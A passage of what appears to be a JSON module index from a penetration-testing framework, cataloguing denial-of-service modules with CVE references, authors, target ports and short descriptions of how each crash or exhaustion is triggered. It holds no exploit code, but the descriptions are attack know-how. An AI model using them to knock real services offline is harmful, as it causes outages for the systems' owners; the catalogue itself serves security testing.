"description": "This module triggers a Denial of Service condition in the Cisco IOS\n telnet service affecting multiple Cisco switches. Tested against Cisco\n Catalyst 2960 and 3750.",
"references": [
"BID-96960",
"CVE-2017-3881",
"URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp",
"URL-https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution"
],
"platform": "",
"arch": "",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/cisco/ios_telnet_rocem.rb",
"is_install_path": true,
"ref_name": "dos/cisco/ios_telnet_rocem",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/dhcp/isc_dhcpd_clientid": {
"name": "ISC DHCP Zero Length ClientID Denial of Service Module",
"full_name": "auxiliary/dos/dhcp/isc_dhcpd_clientid",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sid",
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module performs a Denial of Service Attack against the ISC DHCP server,\n versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request\n message with a 0-length client_id option for an IP address on the appropriate range\n for the dhcp server. When ISC DHCP Server tries to hash this value it exits\n abnormally.",
"references": [
"CVE-2010-2156",
"OSVDB-65246",
"EDB-14185"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb",
"is_install_path": true,
"ref_name": "dos/dhcp/isc_dhcpd_clientid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/dns/bind_tkey": {
"name": "BIND TKEY Query Denial of Service",
"full_name": "auxiliary/dos/dns/bind_tkey",
"rank": 300,
"disclosure_date": "2015-07-28",
"type": "auxiliary",
"author": [
"Jonathan Foote",
"throwawayokejxqbbif",
"wvu <wvu@metasploit.com>"
],
"description": "This module sends a malformed TKEY query, which exploits an\n error in handling TKEY queries on affected BIND9 'named' DNS servers.\n As a result, a vulnerable named server will exit with a REQUIRE\n assertion failure. This condition can be exploited in versions of BIND\n between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0\n through 9.10.2-P2.",
"references": [
"CVE-2015-5477",
"URL-https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/",
"URL-https://kb.isc.org/article/AA-01272"
],
"platform": "",
"arch": "",
"rport": 53,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/auxiliary/dos/dns/bind_tkey.rb",
"is_install_path": true,
"ref_name": "dos/dns/bind_tkey",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/dns/bind_tsig": {
"name": "BIND TKEY Query Denial of Service",
"full_name": "auxiliary/dos/dns/bind_tsig",
"rank": 300,
"disclosure_date": "2016-09-27",
"type": "auxiliary",
"author": [
"Martin Rocha",
"Ezequiel Tavella",
"Alejandro Parodi",
"Infobyte Research Team"
],
"description": "A defect in the rendering of messages into packets can cause named to\n exit with an assertion failure in buffer.c while constructing a response\n to a query that meets certain criteria.\n\n This assertion can be triggered even if the apparent source address\n isn't allowed to make queries.",
"references": [
"CVE-2016-2776",
"URL-http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html"
],
"platform": "",
"arch": "",
"rport": 53,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 10:41:10 +0000",
"path": "/modules/auxiliary/dos/dns/bind_tsig.rb",
"is_install_path": true,
"ref_name": "dos/dns/bind_tsig",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/freebsd/nfsd/nfsd_mount": {
"name": "FreeBSD Remote NFS RPC Request Denial of Service",
"full_name": "auxiliary/dos/freebsd/nfsd/nfsd_mount",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module sends a specially-crafted NFS Mount request causing a\n kernel panic on host running FreeBSD 6.0.",
"references": [
"BID-16838",
"OSVDB-23511",
"CVE-2006-0900"
],
"platform": "",
"arch": "",
"rport": 2049,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb",
"is_install_path": true,
"ref_name": "dos/freebsd/nfsd/nfsd_mount",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/hp/data_protector_rds": {
"name": "HP Data Protector Manager RDS DOS",
"full_name": "auxiliary/dos/hp/data_protector_rds",
"rank": 300,
"disclosure_date": "2011-01-08",
"type": "auxiliary",
"author": [
"Roi Mallo <rmallof@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module causes a remote DOS on HP Data Protector's RDS service. By sending\n a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous\n size for malloc().",
"references": [
"CVE-2011-0514",
"OSVDB-70617",
"EDB-15940"
],
"platform": "",
"arch": "",
"rport": 1530,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/hp/data_protector_rds.rb",
"is_install_path": true,
"ref_name": "dos/hp/data_protector_rds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/3com_superstack_switch": {
"name": "3Com SuperStack Switch Denial of Service",
"full_name": "auxiliary/dos/http/3com_superstack_switch",
"rank": 300,
"disclosure_date": "2004-06-24",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module causes a temporary denial of service condition\n against 3Com SuperStack switches. By sending excessive data\n to the HTTP Management interface, the switch stops responding\n temporarily. The device does not reset. Tested successfully\n against a 3300SM firmware v2.66. Reported to affect versions\n prior to v2.72.",
"references": [
"OSVDB-7246",
"CVE-2004-2691",
"URL-http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/dos/http/3com_superstack_switch.rb",
"is_install_path": true,
"ref_name": "dos/http/3com_superstack_switch",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/apache_commons_fileupload_dos": {
"name": "Apache Commons FileUpload and Apache Tomcat DoS",
"full_name": "auxiliary/dos/http/apache_commons_fileupload_dos",
"rank": 300,
"disclosure_date": "2014-02-06",
"type": "auxiliary",
"author": [
"Unknown",
"ribeirux"
],
"description": "This module triggers an infinite loop in Apache Commons FileUpload 1.0\n through 1.3 via a specially crafted Content-Type header.\n Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle\n mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50\n and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also\n uses Commons FileUpload as part of the Manager application.",
"references": [
"CVE-2014-0050",
"URL-http://tomcat.apache.org/security-8.html",
"URL-http://tomcat.apache.org/security-7.html"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/apache_commons_fileupload_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/apache_mod_isapi": {
"name": "Apache mod_isapi Dangling Pointer",
"full_name": "auxiliary/dos/http/apache_mod_isapi",
"rank": 300,
"disclosure_date": "2010-03-05",
"type": "auxiliary",
"author": [
"Brett Gervasoni",
"jduck <jduck@metasploit.com>"
],
"description": "This module triggers a use-after-free vulnerability in the Apache\n Software Foundation mod_isapi extension for versions 2.2.14 and earlier.\n In order to reach the vulnerable code, the target server must have an\n ISAPI module installed and configured.\n\n By making a request that terminates abnormally (either an aborted TCP\n connection or an unsatisfied chunked request), mod_isapi will unload the\n ISAPI extension. Later, if another request comes for that ISAPI module,\n previously obtained pointers will be used resulting in an access\n violation or potentially arbitrary code execution.\n\n Although arbitrary code execution is theoretically possible, a\n real-world method of invoking this consequence has not been proven. In\n order to do so, one would need to find a situation where a particular\n ISAPI module loads at an image base address that can be re-allocated by\n a remote attacker.\n\n Limited success was encountered using two separate ISAPI modules. In\n this scenario, a second ISAPI module was loaded into the same memory\n area as the previously unloaded module.",
"references": [
"CVE-2010-0425",
"OSVDB-62674",
"BID-38494",
"URL-https://issues.apache.org/bugzilla/show_bug.cgi?id=48509",
"URL-http://www.gossamer-threads.com/lists/apache/cvs/381537",
"URL-http://www.senseofsecurity.com.au/advisories/SOS-10-002",
"EDB-11650"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/apache_mod_isapi.rb",
"is_install_path": true,
"ref_name": "dos/http/apache_mod_isapi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/apache_range_dos": {
"name": "Apache Range Header DoS (Apache Killer)",
"full_name": "auxiliary/dos/http/apache_range_dos",
"rank": 300,
"disclosure_date": "2011-08-19",
"type": "auxiliary",
"author": [
"Kingcope",
"Masashi Fujiwara",
"Markus Neis <markus.neis@gmail.com>"
],
"description": "The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x\n through 2.2.19 allows remote attackers to cause a denial of service (memory and\n CPU consumption) via a Range header that expresses multiple overlapping ranges,\n exploit called \"Apache Killer\"",
"references": [
"BID-49303",
"CVE-2011-3192",
"EDB-17696",
"OSVDB-74721"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-04-25 23:08:19 +0000",
"path": "/modules/auxiliary/dos/http/apache_range_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/apache_range_dos",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/apache_tomcat_transfer_encoding": {
"name": "Apache Tomcat Transfer-Encoding Information Disclosure and DoS",
"full_name": "auxiliary/dos/http/apache_tomcat_transfer_encoding",
"rank": 300,
"disclosure_date": "2010-07-09",
"type": "auxiliary",
"author": [
"Steve Jones",
"Hoagie <andi@void.at>",
"Paulino Calderon <calderon@websec.mx>"
],
"description": "Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not\n properly handle an invalid Transfer-Encoding header, which allows remote attackers\n to cause a denial of service (application outage) or obtain sensitive information\n via a crafted header that interferes with \"recycling of a buffer.\"",
"references": [
"CVE-2010-2227",
"OSVDB-66319",
"BID-41544"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb",
"is_install_path": true,
"ref_name": "dos/http/apache_tomcat_transfer_encoding",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/brother_debut_dos": {
"name": "Brother Debut http Denial Of Service",
"full_name": "auxiliary/dos/http/brother_debut_dos",
"rank": 300,
"disclosure_date": "2017-11-02",
"type": "auxiliary",
"author": [
"z00n <0xz00n@gmail.com>",
"h00die"
],
"description": "The Debut embedded HTTP server <= 1.20 on Brother printers allows for a Denial\n of Service (DoS) condition via a crafted HTTP request. The printer will be\n unresponsive from HTTP and printing requests for ~300 seconds. After which, the\n printer will start responding again.",
"references": [
"CVE-2017-16249",
"URL-https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-017/?fid=10211"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-01-24 20:54:21 +0000",
"path": "/modules/auxiliary/dos/http/brother_debut_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/brother_debut_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/canon_wireless_printer": {
"name": "Canon Wireless Printer Denial Of Service",
"full_name": "auxiliary/dos/http/canon_wireless_printer",
"rank": 300,
"disclosure_date": "2013-06-18",
"type": "auxiliary",
"author": [
"Matt \"hostess\" Andreko <mandreko@accuvant.com>"
],
"description": "The HTTP management interface on several models of Canon Wireless printers\n allows for a Denial of Service (DoS) condition via a crafted HTTP request. Note:\n if this module is successful, the device can only be recovered with a physical\n power cycle.",
"references": [
"CVE-2013-4615",
"URL-http://www.mattandreko.com/2013/06/canon-y-u-no-security.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/canon_wireless_printer.rb",
"is_install_path": true,
"ref_name": "dos/http/canon_wireless_printer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/dell_openmanage_post": {
"name": "Dell OpenManage POST Request Heap Overflow (win32)",
"full_name": "auxiliary/dos/http/dell_openmanage_post",
"rank": 300,
"disclosure_date": "2004-02-26",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a heap overflow in the Dell OpenManage\n Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability\n exists due to a boundary error within the handling of POST requests,\n where the application input is set to an overly long file name.\n This module will crash the web server, however it is likely exploitable\n under certain conditions.",
"references": [
"URL-http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html",
"BID-9750",
"OSVDB-4077",
"CVE-2004-0331"
],
"platform": "",
"arch": "",
"rport": 1311,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/dos/http/dell_openmanage_post.rb",
"is_install_path": true,
"ref_name": "dos/http/dell_openmanage_post",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/f5_bigip_apm_max_sessions": {
"name": "F5 BigIP Access Policy Manager Session Exhaustion Denial of Service",
"full_name": "auxiliary/dos/http/f5_bigip_apm_max_sessions",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Denis Kolegov <dnkolegov@gmail.com>",
"Oleg Broslavsky <ovbroslavsky@gmail.com>",
"Nikita Oleksov <neoleksov@gmail.com>"
],
"description": "This module exploits a resource exhaustion denial of service in F5 BigIP devices. An\n unauthenticated attacker can establish multiple connections with BigIP Access Policy\n Manager (APM) and exhaust all available sessions defined in customer license. In the\n first step of the BigIP APM negotiation the client sends a HTTP request. The BigIP\n system creates a session, marks it as pending and then redirects the client to an access\n policy URI. Since BigIP allocates a new session after the first unauthenticated request,\n and deletes the session only if an access policy timeout expires, the attacker can exhaust\n all available sessions by repeatedly sending the initial HTTP request and leaving the\n sessions as pending.",
"references": [
"URL-https://support.f5.com/kb/en-us/products/big-ip_apm/releasenotes/product/relnote-apm-11-6-0.html"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb",
"is_install_path": true,
"ref_name": "dos/http/f5_bigip_apm_max_sessions",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/flexense_http_server_dos": {
"name": "Flexense HTTP Server Denial Of Service",
"full_name": "auxiliary/dos/http/flexense_http_server_dos",
"rank": 300,
"disclosure_date": "2018-03-09",
"type": "auxiliary",
"author": [
"Ege Balci <ege.balci@invictuseurope.com>"
],
"description": "This module triggers a Denial of Service vulnerability in the Flexense HTTP server.\n Vulnerability caused by a user mode write access memory violation and can be triggered with\n rapidly sending variety of HTTP requests with long HTTP header values.\n\n Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable.",
"references": [
"CVE-2018-8065",
"URL-https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-05-29 16:09:27 +0000",
"path": "/modules/auxiliary/dos/http/flexense_http_server_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/flexense_http_server_dos",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/gzip_bomb_dos": {
"name": "Gzip Memory Bomb Denial Of Service",
"full_name": "auxiliary/dos/http/gzip_bomb_dos",
"rank": 300,
"disclosure_date": "2004-01-01",
"type": "auxiliary",
"author": [
"info <info@aerasec.de>",
"joev <joev@metasploit.com>"
],
"description": "This module generates and hosts a 10MB single-round gzip file that decompresses to 10GB.\n Many applications will not implement a length limit check and will eat up all memory and\n eventually die. This can also be used to kill systems that download/parse content from\n a user-provided URL (image-processing servers, AV, websites that accept zipped POST data, etc).\n\n A FILEPATH datastore option can also be provided to save the .gz bomb locally.\n\n Some clients (Firefox) will allow for multiple rounds of gzip. Most gzip utils will correctly\n deflate multiple rounds of gzip on a file. Setting ROUNDS=3 and SIZE=10240 (default value)\n will generate a 300 byte gzipped file that expands to 10GB.",
"references": [
"URL-http://www.aerasec.de/security/advisories/decompression-bomb-vulnerability.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/gzip_bomb_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/gzip_bomb_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/hashcollision_dos": {
"name": "Hashtable Collisions",
"full_name": "auxiliary/dos/http/hashcollision_dos",
"rank": 300,
"disclosure_date": "2011-12-28",
"type": "auxiliary",
"author": [
"Alexander Klink",
"Julian Waelde",
"Scott A. Crosby",
"Dan S. Wallach",
"Krzysztof Kotowicz",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module uses a denial-of-service (DoS) condition appearing in a variety of\n programming languages. This vulnerability occurs when storing multiple values\n in a hash table and all values have the same hash value. This can cause a web server\n parsing the POST parameters issued with a request into a hash table to consume\n hours of CPU with a single HTTP request.\n\n Currently, only the hash functions for PHP and Java are implemented.\n This module was tested with PHP + httpd, Tomcat, Glassfish and Geronimo.\n It also generates a random payload to bypass some IDS signatures.",
"references": [
"URL-http://www.ocert.org/advisories/ocert-2011-003.html",
"URL-http://www.nruns.com/_downloads/advisory28122011.pdf",
"URL-http://events.ccc.de/congress/2011/Fahrplan/events/4680.en.html",
"URL-http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf",
"URL-http://www.youtube.com/watch?v=R2Cq3CLI6H8",
"CVE-2011-5034",
"CVE-2011-5035",
"CVE-2011-4885",
"CVE-2011-4858"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/hashcollision_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/hashcollision_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/ibm_lotus_notes": {
"name": "IBM Notes encodeURI DOS",
"full_name": "auxiliary/dos/http/ibm_lotus_notes",
"rank": 300,
"disclosure_date": "2017-08-31",
"type": "auxiliary",
"author": [
"Dhiraj Mishra"
],
"description": "This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.\n If successful, it could cause the Notes client to hang and have to be restarted.",
"references": [
"EXPLOIT-DB-42602",
"CVE-2017-1129",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21999385"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-10-09 17:02:24 +0000",
"path": "/modules/auxiliary/dos/http/ibm_lotus_notes.rb",
"is_install_path": true,
"ref_name": "dos/http/ibm_lotus_notes",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/ibm_lotus_notes2": {
"name": "IBM Notes Denial Of Service",
"full_name": "auxiliary/dos/http/ibm_lotus_notes2",
"rank": 300,
"disclosure_date": "2017-08-31",
"type": "auxiliary",
"author": [
"Dhiraj Mishra"
],
"description": "This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.\n If successful, the browser will crash after viewing the webpage.",
"references": [
"EDB-42604",
"CVE-2017-1130"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-06 20:45:50 +0000",
"path": "/modules/auxiliary/dos/http/ibm_lotus_notes2.rb",
"is_install_path": true,
"ref_name": "dos/http/ibm_lotus_notes2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/marked_redos": {
"name": "marked npm module \"heading\" ReDoS",
"full_name": "auxiliary/dos/http/marked_redos",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Adam Cazzolla, Sonatype Security Research",
"Nick Starke, Sonatype Security Research"
],
"description": "This module exploits a Regular Expression Denial of Service vulnerability\n in the npm module \"marked\". The vulnerable portion of code that this module\n targets is in the \"heading\" regular expression. Web applications that use\n \"marked\" for generating html from markdown are vulnerable. Versions up to\n 0.4.0 are vulnerable.",
"references": [
"URL-https://blog.sonatype.com/cve-2017-17461-vulnerable-or-not",
"CWE-400"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-16 14:59:32 +0000",
"path": "/modules/auxiliary/dos/http/marked_redos.rb",
"is_install_path": true,
"ref_name": "dos/http/marked_redos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/monkey_headers": {
"name": "Monkey HTTPD Header Parsing Denial of Service (DoS)",
"full_name": "auxiliary/dos/http/monkey_headers",
"rank": 300,
"disclosure_date": "2013-05-30",
"type": "auxiliary",
"author": [
"Doug Prostko <dougtko@gmail.com>"
],
"description": "This module causes improper header parsing that leads to a segmentation fault\n due to a specially crafted HTTP request. Affects version <= 1.2.0.",
"references": [
"CVE-2013-3843",
"OSVDB-93853",
"BID-60333"
],
"platform": "",
"arch": "",
"rport": 2001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/monkey_headers.rb",
"is_install_path": true,
"ref_name": "dos/http/monkey_headers",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/ms15_034_ulonglongadd": {
"name": "MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service",
"full_name": "auxiliary/dos/http/ms15_034_ulonglongadd",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Bill Finlayson",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a\n vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code\n execution. This module will try to cause a denial-of-service.",
"references": [
"CVE-2015-1635",
"MSB-MS15-034",
"URL-http://pastebin.com/ypURDPc4",
"URL-https://github.com/rapid7/metasploit-framework/pull/5150",
"URL-https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection",
"URL-http://www.securitysift.com/an-analysis-of-ms15-034/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb",
"is_install_path": true,
"ref_name": "dos/http/ms15_034_ulonglongadd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/nodejs_pipelining": {
"name": "Node.js HTTP Pipelining Denial of Service",
"full_name": "auxiliary/dos/http/nodejs_pipelining",
"rank": 300,
"disclosure_date": "2013-10-18",
"type": "auxiliary",
"author": [
"Marek Majkowski",
"titanous",
"joev <joev@metasploit.com>"
],
"description": "This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions\n released before 0.10.21 and 0.8.26. The attack sends many pipelined\n HTTP requests on a single connection, which causes unbounded memory\n allocation when the client does not read the responses.",
"references": [
"CVE-2013-4450",
"OSVDB-98724",
"BID-63229",
"URL-http://blog.nodejs.org/2013/10/22/cve-2013-4450-http-server-pipeline-flood-dos"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/nodejs_pipelining.rb",
"is_install_path": true,
"ref_name": "dos/http/nodejs_pipelining",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/novell_file_reporter_heap_bof": {
"name": "NFR Agent Heap Overflow Vulnerability",
"full_name": "auxiliary/dos/http/novell_file_reporter_heap_bof",
"rank": 300,
"disclosure_date": "2012-11-16",
"type": "auxiliary",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a heap overflow in NFRAgent.exe, a component of Novell\n File Reporter (NFR). The vulnerability occurs when handling requests of name \"SRS\",\n where NFRAgent.exe fails to generate a response in a secure way, copying user\n controlled data into a fixed-length buffer in the heap without bounds checking.\n This module has been tested against NFR Agent 1.0.4.3 (File Reporter 1.0.2).",
"references": [
"CVE-2012-4956",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
],
"platform": "",
"arch": "",
"rport": 3037,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb",
"is_install_path": true,
"ref_name": "dos/http/novell_file_reporter_heap_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/rails_action_view": {
"name": "Ruby on Rails Action View MIME Memory Exhaustion",
"full_name": "auxiliary/dos/http/rails_action_view",
"rank": 300,
"disclosure_date": "2013-12-04",
"type": "auxiliary",
"author": [
"Toby Hsieh",
"joev <joev@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a Denial of Service (DoS) condition in Action View that requires\n a controller action. By sending a specially crafted content-type header to a Rails\n application, it is possible for it to store the invalid MIME type, and may eventually\n consume all memory if enough invalid MIMEs are given.\n\n Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.",
"references": [
"CVE-2013-6414",
"OSVDB-100525",
"BID-64074",
"URL-https://seclists.org/oss-sec/2013/q4/400",
"URL-https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/dos/http/rails_action_view.rb",
"is_install_path": true,
"ref_name": "dos/http/rails_action_view",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/http/rails_json_float_dos": {
"name": "Ruby on Rails JSON Processor Floating Point Heap Overflow DoS",
"full_name": "auxiliary/dos/http/rails_json_float_dos",
"rank": 300,
"disclosure_date": "2013-11-22",
"type": "auxiliary",
"author": [
"Charlie Somerville",
"joev <joev@metasploit.com>",
"todb <todb@metasploit.com>"
],
"description": "When Ruby attempts to convert a string representation of a large floating point\n decimal number to its floating point equivalent, a heap-based buffer overflow\n can be triggered. This module has been tested successfully on a Ruby on Rails application\n using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application\n crashes with a segfault error. Other versions of Ruby are reported to be affected.",
"references": [
"CVE-2013-4164",
"OSVDB-100113",
"URL-https://www.ruby-lang.org/en/news/2013/11/22/ruby-1-9-3-p484-is-released/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
